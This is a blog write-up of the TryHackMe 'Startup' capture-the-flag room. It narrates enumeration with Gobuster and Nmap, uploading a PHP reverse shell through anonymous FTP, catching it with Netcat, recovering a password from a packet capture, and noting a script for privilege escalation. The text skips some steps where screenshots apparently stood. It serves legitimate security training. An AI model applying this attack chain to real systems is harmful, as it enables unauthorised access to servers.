STARTUP
Startup is a TryHackMe room where there is a fictional new start up company called Spice Hut, their website is under development and they have some security concerns that they wish to test.
I began by heading to the website and began manual enumeration of the site. The site had very minimal functionality, I checked the source code and found nothing of interest. There is a contact link, and I was hoping to be able to get an email address by following it, but it was empty.
I then performed a Gobuster scan to look for any pages that I may be able to access. There is a page with the name files that is of particular interest.
Here I can see there is an FTP folder, upon opening it I can see that it is empty. I made a note of this as I may be able to upload files to it at a later stage,
I then opened important.jpg which seemed to be of no particular interest, and notice.txt had the below text. I made a note of the name Maya, which could be a potential user or username in the future. the notice also mentioned that people were able to download files from the website, which suggests there may be a way of uploading files too.
The next step was to do an Nmap scan to check for open ports on the target IP. There was an open FTP port that allowed anonymous access. I immediately thought of Pentestmoney's php reverse shell because of the ability to access files through the targets website.
I then edited the PHP reverse shell so it had the appropriate IP address and port number, accessed the targets FTP using anonymous credentials and uploaded the PHP reverse shell using the put command.
I set up a Netcat listener to listen for my reverse PHP reverse shell that I had uploaded via FTP to the target machine. I then opened the PHP reverse shell by visiting it via the target website in the FTP folder.
Using the
ls -la
command, I was able to find the file recipe.txt. I then used the command cat recipe.txt
to find the first flag.I was unaware of the .pcapng file extension, but after some research I found it was packet capture format, which contains information on packets (more details can be found at https://fileinfo.com/extension/pcapng). I then learned that a way to read these files was wireshark, which came pre-installed on the TryHackMe virtual machine.
I copied the suspicious.pcapng file to
/var/www/html/files/ftp
and downloaded the file to my machine.I then tried this password with lennie's username and I was able to gain access.
With this new escalated access, I was able to find the next flag.
Whilst continuing to explore what I now had access to I found directories named scripts and Documents. Documents did not have anything of particular interest and scripts contained files called planner.sh and startup_list.txt. The startup_lists.txt is empty.
Planner.sh is a script that echo's a variable in to the startup_list.txt and then executes /etc/print.sh. I made a note of the location of print.sh for further investigation.
Conclusion
Comments
Post a Comment